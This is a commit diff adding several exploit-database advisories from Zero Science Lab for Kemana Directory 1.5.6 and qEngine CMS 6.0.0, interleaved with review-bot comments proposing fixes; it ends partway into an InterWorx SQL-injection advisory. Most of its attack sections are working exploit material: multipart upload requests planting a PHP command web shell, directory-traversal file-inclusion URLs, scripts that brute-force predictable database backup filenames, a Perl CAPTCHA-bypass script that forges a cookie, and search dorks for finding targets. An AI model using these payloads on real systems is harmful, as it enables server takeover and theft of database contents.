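Review bot: the stray leading "?" needs removing here too. The description covers only kemana_admin_passwd, but the captured Cookie header also carries kemana_user_id=guest*<32 hex characters> and qvc_value (40 hex characters); the advisory should say what those values are, since a reader cannot tell whether the user-side cookie has the same weakness. The impact statement is narrower than the finding: the value is a bare 40-hex SHA1 with no salt visible, so anyone who obtains the cookie (proxy or server logs, browser storage on a shared machine, not only an on-path attacker) can match it against precomputed tables, which is the reason a password hash must never double as a session token. Recommend an opaque random session identifier as the fix.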

platforms/php/webapps/32507.txt Executable file

@ -0,0 +1,261 @@
?
Kemana Directory 1.5.6 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana Directory suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5178
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5178.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > Articles > Manage Categories > Create A New Category)
POST http://localhost/kemana/admin/task.php?mod=portal&run=pcat_edit.php& HTTP/1.1
-----------------------------18727540915953
Content-Disposition: form-data; name="AXSRF_token"
12adff6127dfa3355ac24bad4a4c8687
-----------------------------18727540915953
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------18727540915953
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------18727540915953
Content-Disposition: form-data; name="primary_key"
cat_id
-----------------------------18727540915953
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------18727540915953
Content-Disposition: form-data; name="parent"
0
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_note"
nothing to note
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_keywords"
Zero Science Lab
-----------------------------18727540915953
Content-Disposition: form-data; name="cat_img"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------18727540915953--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
#2 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/kemana/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
#3 (Tools > File Manager > Upload)
POST http://localhost/kemana/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/kemana/shell.php?cmd=whoami
#4 (Contents > Slideshow > Add Entry)
POST http://localhost/kemana/admin/featured_content.php? HTTP/1.1
-----------------------------9813040432632
Content-Disposition: form-data; name="AXSRF_token"
516e6705d27d7d242d948d16b18a6339
-----------------------------9813040432632
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------9813040432632
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------9813040432632
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------9813040432632
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_title"
Zero Science Lab
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_img"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_url"
http://www.zeroscience.mk
-----------------------------9813040432632
Content-Disposition: form-data; name="feat_text"
<p>TEST</p>
-----------------------------9813040432632--
Upload location: http://localhost/kemana/public/image/
Exec: http://localhost/kemana/public/image/shell.php?cmd=whoami
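Review bot: the advisory stops at the reproduction steps and never records a fix. Each of the four upload paths (#1 `cat_img`, #2 `page_image`, #3 `userfile_n`, #4 `feat_img`) ends with an "Upload location" and "Exec" line, but there is no vendor-notification timeline, fixed version or mitigation, unlike the InterWorx entry in this same commit (32516.txt carries "Solution Status: Fixed in Version 5.0.14 build 577"). Add at minimum a vendor-status line, and the defensive point the text implies deserves one sentence for anyone running Kemana: validate the uploaded file's extension and content server-side, and serve `/public/image/` and the file-manager target directories with PHP execution disabled.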

platforms/php/webapps/32508.txt Executable file

@ -0,0 +1,47 @@
?
Kemana Directory 1.5.6 (run param) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'run' parameter to task.php is
not properly verified before being used to include files. This can
be exploited to include files from local resources with directory
traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5177
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5177.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/kemana/admin/task.php?run=../../../../../../windows/win.ini
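Review bot: the file starts with a stray `?` on its own line before the title, a UTF-8 BOM rendered as a literal character; drop it so the entry begins at "Kemana Directory 1.5.6 (run param) ...". The description names the sink (the `run` parameter to task.php used in an include without verification) but not the remedy: restrict `run` to a fixed set of module script names (an allowlist checked after `basename()`), rather than trying to filter `../` sequences, and, as with the other ZSL entries, record the vendor status.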

platforms/php/webapps/32509.txt Executable file

@ -0,0 +1,177 @@
<?php
/*
Kemana Directory 1.5.6 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 1.5.6
Summary: Experience the ultimate directory script solution
with Kemana. Create your own Yahoo or Dmoz easily with Kemana.
Unique Kemana's features including: CMS engine based on our
qEngine, multiple directories support, user friendly administration
control panel, easy to use custom fields, unsurpassed flexibility.
Desc: Kemana stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as '_Full Backup YYYYMMDD_1.sql' or '_Full Backup YYYYMMDD_1.gz',
which can be exploited to disclose sensitive information by
downloading the file. The '/admin/backup' is also vulnerable to
directory listing by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5176
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5176.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| Kemana Directory 1.5.6 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5176 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: '_Full Backup ".$godina.$mesec.$dn."_1".$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/_".$dbnm.$godina.$mesec.$dn."_1".$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>
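Review bot: `$x` is incremented at `$x++` without ever being initialised, and the total passed to `status($x, 58)` does not match the 5 years x 12 months = 60 outer iterations, so the bar reports 100% two iterations early and the early `if($done > $total) return;` then discards the last two updates; add `$x = 0;` before the loops and pass 60. Both problems are hidden by `error_reporting(0);`. The Desc block also already contains the defensive reading and should state it as a fix line: backups are written under the web root with a date-derived name into a directory that lists by default, and the remedy is to store them outside the document root (or at least under an unpredictable name in a directory with listing disabled).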

platforms/php/webapps/32510.txt Executable file

@ -0,0 +1,103 @@
?#!C:\Perl64\bin\perl.exe
#
# Kemana Directory 1.5.6 (qvc_init()) Cookie Poisoning CAPTCHA Bypass Exploit
#
#
# Vendor: C97net
# Product web page: http://www.c97.net
# Affected version: 1.5.6
#
# Summary: Experience the ultimate directory script solution with Kemana.
# Create your own Yahoo or Dmoz easily with Kemana. Unique Kemana's features
# including: CMS engine based on our qEngine, multiple directories support,
# user friendly administration control panel, easy to use custom fields,
# unsurpassed flexibility.
#
# Desc: The CAPTCHA function for Kemana Directory is prone to a security
# bypass vulnerability that occurs in the CAPTCHA authentication routine.
# The function 'qvc_init()' in '/includes/function.php' sets a cookie with
# a SHA1-based hash value in the Response Header which can be replaced by
# a random SHA1 computed hash value using Cookie Poisoning attack. Successful
# exploit will allow attackers to bypass the CAPTCHA-based authentication
# challenge and perform brute-force attacks.
#
#
# =============================================================================
# /includes/function.php:
# -----------------------
#
# 1774: /*------- ( QVC - VISUAL CONFIRMATION FUNCTIONS aka CAPTCHA ) ------- */
# 1775:
# 1776:
# 1777: // qVC - the simplest visual confirmation engine yet
# 1778: // use qvc_init() --> <img src="visual.php"> --> compare qvc_value() == sha1 (strtolower($user_input) )?
# 1779: // qVC uses db to communicate with visual.php, then set user cookie using sha1, then db not used!
# 1780: // $num = either 3 or 5, 3 => only 0-9, 5 => 0-F
# 1781: function qvc_init ($num = 5)
# 1782: {
# 1783: if ($num == 3)
# 1784: $value = mt_rand (100, 999);
# 1785: else
# 1786: $value = random_str (5);
# 1787: ip_config_update ('visual', $value);
# 1788: setcookie ('qvc_value', sha1 ($value), 0, '/');
# 1789: }
# 1790:
# 1791:
# 1792: // return qvc value (it's sha1'd, so be sure to compare with sha1'd value)
# 1793: function qvc_value ()
# 1794: {
# 1795: $correct_val = cookie_param ('qvc_value');
# 1796:
# 1797: // block browser BACK
# 1798: qvc_init ();
# 1799: return $correct_val;
# 1800: }
# =============================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
# Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2014-5175
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5175.php
#
#
# Dork #1: intitle:powered by c97.net
# Dork #2: intitle:powered by qEngine
# Dork #3: intitle:powered by Kemana.c97.net
# Dork #4: intitle:powered by Cart2.c97.net
#
#
# 08.03.2014
#
use LWP::UserAgent;use HTTP::Cookies;use HTTP::Request::Common;use Digest::SHA;info();#2014-03
$url="http://localhost/kemana/admin/login.php";$domain="localhost.local";$juzer="admin";$pass=
"admin";$cookie_jar=HTTP::Cookies->new();$ua=LWP::UserAgent->new;$ua->cookie_jar($cookie_jar);
print" [*] Sending request.\n";sleep(1);$request=GET $url;$response=$ua->request($request);#$_
print" [*] Reading cookie from Response Headers.\n";$cookie_jar->extract_cookies($response);#1
print" [*] ".$cookie_jar->as_string();sleep(1);$kuki=$cookie_jar->as_string;($regexp)=$kuki#].
=~/qvc_value=(.*?);/;print" [*] Got CAPTCHA: ".$regexp."\n";$sha=Digest::SHA->new();$data=#(";
"joxypoxy";$sha->add($data);$digest=$sha->hexdigest;print" [*] Poisoning with: ".$digest."\n";
$cookie_jar->set_cookie(0,'qvc_value',$digest,'/',$domain);print" [*] ".$cookie_jar->as_string
;sleep(1);print" [*] Sending login credentials.\n";$postche=$ua->request(POST $url,[user_id=>$
juzer,user_passwd=>$pass,visual=>$data]);print"\n";$check=$postche->as_string;if($check=~#get;
"HTTP/1.1 302 Found"){print" [*] CAPTCHA bypassed!\n";}else{print" [!] Didn\'t work.\n";}sub#\
info(){print"
+-----------------------------------------------------+
| |
| Kemana Directory CAPTCHA Bypass PoC Exploit |
| |
| ID: ZSL-2014-5175 |
| |
+-----------------------------------------------------+
\n\n";}
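Review bot: the shebang line carries a stray leading `?` (`?#!C:\Perl64\bin\perl.exe`), a BOM artifact that would also defeat the shebang on any Unix host; strip it. The source quoted in the header pins the root cause exactly: `qvc_value()` returns `cookie_param('qvc_value')`, the value the client sent back, while the server-side copy saved by `ip_config_update('visual', $value)` is never consulted again (the comment says "then db not used!"), so the comparison is entirely client-controlled. The entry should say so as the fix: compare the user's input against the stored server-side value (or against an HMAC keyed with a server secret), never against a client-supplied hash. For anyone indexing the file, the packed 80-column layout with trailing comment fragments (`#2014-03`, `#$_`, `#].`, `sub#\`) is deliberate styling, not corruption; `sub` followed by a comment and `info(){` on the next line still parses as one declaration.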

platforms/php/webapps/32511.txt Executable file

@ -0,0 +1,514 @@
<?php
/*
qEngine CMS 6.0.0 Database Backup Disclosure Exploit
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS stores database backups using the Backup DB tool
with a predictable file name inside the '/admin/backup' directory
as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which
can be exploited to disclose sensitive information by downloading
the file. The '/admin/backup' is also vulnerable to directory listing
by default.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5172
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5172.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
*/
error_reporting(0);
function status($done, $total, $size=20)
{
static $start_time;
if($done > $total) return;
if(empty($start_time)) $start_time=time();
$now = time();
$perc=(double)($done/$total);
$bar=floor($perc*$size);
$disp=number_format($perc*100, 0);
$status_bar="\r $disp% [";
$status_bar.=str_repeat("=", $bar);
if($bar<$size)
{
$status_bar.=">";
$status_bar.=str_repeat(" ", $size-$bar);
} else
{
$status_bar.="=";
}
$status_bar.="] $done/$total";
$rate = ($now-$start_time)/$done;
$left = $total - $done;
$eta = round($rate * $left, 2);
$elapsed = $now - $start_time;
$status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec.";
echo "$status_bar ";
flush();
if($done == $total)
{
echo "\n";
}
}
print "
@---------------------------------------------------------------@
| |
| qEngine CMS 6.0.0 Database Backup Disclosure Exploit |
| |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
| Advisory ID: ZSL-2014-5172 |
| www.zeroscience.mk |
| |
@---------------------------------------------------------------@
";
if ($argc < 4)
{
print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n";
print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n";
die();
}
$godina_array = array('2014','2013','2012','2011','2010');
$mesec_array = array('12','11','10','09',
'08','07','06','05',
'04','03','02','01');
$dn_array = array('31','30','29','28','27','26',
'25','24','23','22','21','20',
'19','18','17','16','15','14',
'13','12','11','10','09','08',
'07','06','05','04','03','02',
'01');
$host = $argv[1];
$port = intval($argv[2]);
$path = $argv[3];
$dbnm = "Full%20Backup%20";
$alert1 = "\033[1;31m";
$alert2 = "\033[0;37m";
$alert3 = "\033[1;32m";
echo "\n [*] Running checks:\n\n";
foreach($godina_array as $godina)
{
foreach($mesec_array as $mesec)
{
$x++;
status($x, 58);
foreach($dn_array as $dn)
{
$ext=".gz";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
$ext=".sql";
if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext))
{
echo "\n";
echo $alert1;
print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n";
echo $alert2;
print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n";
print " Full URL:\x20";
echo $alert3;
die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n");
}
}
}
}
print "\n\n [*] Zero findings!\n\n\n";
?>
#######################################################################################
qEngine CMS 6.0.0 (task.php) Local File Inclusion Vulnerability
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS suffers from an authenticated file inclusion
vulnerability (LFI) when input passed thru the 'run' parameter to
task.php is not properly verified before being used to include files.
This can be exploited to include files from local resources with
directory traversal attacks.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5173
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5173.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
http://localhost/qe6_0/admin/task.php?run=../../../../../../windows/win.ini
#########################################################################?
qEngine CMS 6.0.0 Remote Code Execution
Vendor: C97net
Product web page: http://www.c97.net
Affected version: 6.0.0 and 4.1.6
Summary: qEngine (qE) is a lightweight, fast, yet feature packed
CMS script to help you building your site quickly. Using template
engine to separate the php codes from the design, you don't need
to touch the codes to design your web site. qE is also expandable
by using modules.
Desc: qEngine CMS suffers from an authenticated arbitrary code
execution. The vulnerability is caused due to the improper verification
of uploaded files in several modules thru several POST parameters.
This can be exploited to execute arbitrary PHP code by uploading
a malicious PHP script file that will be stored in '/public/image'
directory. Minimum permissions needed for a user to upload any file:
User level: Regular (param: user_level=1)
Admin level: Editor (param: admin_level=3)
Only the 'Super Admin' level makes the Tool 'File Manager' available.
Tested on: Apache/2.4.7 (Win32)
PHP/5.5.6
MySQL 5.6.14
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5174
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5174.php
Dork #1: intitle:powered by c97.net
Dork #2: intitle:powered by qEngine
Dork #3: intitle:powered by Kemana.c97.net
Dork #4: intitle:powered by Cart2.c97.net
07.03.2014
---
#1 (Modules > qBanner > Manage Banner > Add Entry)
POST http://localhost/qe6/admin/task.php?mod=qbanner&run=edit.php& HTTP/1.1
-----------------------------225222869427624
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------225222869427624
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------225222869427624
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------225222869427624
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------225222869427624
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------225222869427624
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------225222869427624
Content-Disposition: form-data; name="group_id"
QBANR
-----------------------------225222869427624
Content-Disposition: form-data; name="page_body"
This page is part of qBanner module. Please use qBanner Manager to edit this page.
-----------------------------225222869427624
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------225222869427624
Content-Disposition: form-data; name="page_list"
-----------------------------225222869427624--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami
#2 (Tools > File Manager > Upload)
POST http://localhost/qe6/admin/fman/upload_process.php HTTP/1.1
-----------------------------76802486520945
Content-Disposition: form-data; name="chdir"
-----------------------------76802486520945
Content-Disposition: form-data; name="n"
5
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_1"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_2"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_3"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_4"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945
Content-Disposition: form-data; name="userfile_5"; filename=""
Content-Type: application/octet-stream
-----------------------------76802486520945--
Upload location: Anywhere within the webroot folder and its subfolders.
Exec: http://localhost/qe6/shell.php?cmd=whoami
#3 (Modules > Slideshow > Manage Slides > Add Entry)
POST http://localhost/qe6/admin/task.php?mod=slideshow&run=edit.php& HTTP/1.1
-----------------------------23201806221528
Content-Disposition: form-data; name="AXSRF_token"
52e9c9ff9bb251a144b82a662496f5b8
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------23201806221528
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_key"
page_id
-----------------------------23201806221528
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------23201806221528
Content-Disposition: form-data; name="page_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------23201806221528
Content-Disposition: form-data; name="page_title"
ZSL
-----------------------------23201806221528
Content-Disposition: form-data; name="page_keyword"
http://www.zeroscience.mk
-----------------------------23201806221528
Content-Disposition: form-data; name="group_id"
SSHOW
-----------------------------23201806221528
Content-Disposition: form-data; name="page_body"
This page is part of SlideShow module. Please use SlideShow Manager to edit this page.
-----------------------------23201806221528
Content-Disposition: form-data; name="page_allow_comment"
-----------------------------23201806221528
Content-Disposition: form-data; name="page_list"
-----------------------------23201806221528--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami
#4 (Contents > Manage Categories > Add Entry)
POST http://localhost/qe6/admin/page_cat.php? HTTP/1.1
-----------------------------205172563220150
Content-Disposition: form-data; name="AXSRF_token"
3afa0c7483889ac54d7b6afa4083a9a2
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_cmd"
new
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_process"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="qadmin_savenew"
0
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_key"
idx
-----------------------------205172563220150
Content-Disposition: form-data; name="primary_val"
dummy
-----------------------------205172563220150
Content-Disposition: form-data; name="group_id"
GENPG
-----------------------------205172563220150
Content-Disposition: form-data; name="parent_id"
1
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_name"
ZSL
-----------------------------205172563220150
Content-Disposition: form-data; name="permalink"
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_details"
<p>Zero Science Lab</p>
-----------------------------205172563220150
Content-Disposition: form-data; name="cat_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php passthru($_GET['cmd']); ?>
-----------------------------205172563220150--
Upload location: http://localhost/qe6/public/image/
Exec: http://localhost/qe6/public/image/shell.php?cmd=whoami
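Review bot: this single 514-line entry concatenates three separate advisories (ZSL-2014-5172 backup disclosure, ZSL-2014-5173 task.php LFI, ZSL-2014-5174 upload RCE) with `####` separator lines, and the stray `?` at the end of the second separator (`#########...#?`) is the BOM of the third file that was pasted in; the index can carry only one title for it, so either split the file into three entries or list all three advisory IDs in the title. The PHP section is the 32509.txt script with a different filename pattern (no leading `_` and no `_1` suffix) and inherits the same defects: `$x` used at `$x++` without initialisation and `status($x, 58)` for 60 iterations, both masked by `error_reporting(0);`. Everything after the closing `?>` would be echoed verbatim if the file were run as PHP, another reason to split it. As in the Kemana RCE entry, the upload section records the minimum privilege needed ("Admin level: Editor", `admin_level=3`) but no fix or vendor status.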

platforms/php/webapps/32516.txt Executable file

@ -0,0 +1,72 @@
=================================================
Title: SQL injection in InterWorx Control Panel
Product: InterWorx Web Control Panel
Vendor: InterWorx LLC
Tested Version: 5.0.13 build 574
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-2531
Solution Status: Fixed in Version 5.0.14 build 577
Discovered and Provided: Eric Flokstra
=================================================
About the Vendor:
-------------------------
The InterWorx Hosting Control Panel is a web hosting and linux server
management system that provides tools for server administrators to
command their servers and for end users to oversee the operations of
their website.
Advisory Details:
-----------------------
SQL injection vulnerability in the InterWorx Web Control Panel.
